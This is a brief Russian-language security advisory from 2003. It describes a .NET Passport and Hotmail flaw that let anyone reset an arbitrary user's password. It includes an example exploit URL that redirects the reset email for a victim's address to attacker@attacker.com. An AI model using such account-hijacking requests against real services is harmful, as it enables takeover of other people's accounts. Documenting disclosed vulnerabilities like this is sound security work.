Изменение паролей пользователей Microsoft .NET Passport
| Дата публикации: | 12.05.2003 |
| Всего просмотров: | 2493 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в Microsoft .NET Passport, которая также воздействует на учетные записи Hotmail. Удаленный пользователь может изменить пароль произвольного пользователя и получить доступ к целевой учетной записи пользователя.
Сообщается, что удаленный пользователь может использовать форму сброса пароля .NET Passport, чтобы изменить пароль произвольного пользователя. Пример: https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1Удаленный пользователь (attacker@attacker.com) получит почтовое сообщение от .NET Passport сервера, в котором содержится URL для изменения пароля. Форма не требует ввода предыдущего пароля. |
| Ссылки: | Hotmail & Passport (.NET Accounts) Vulnerability |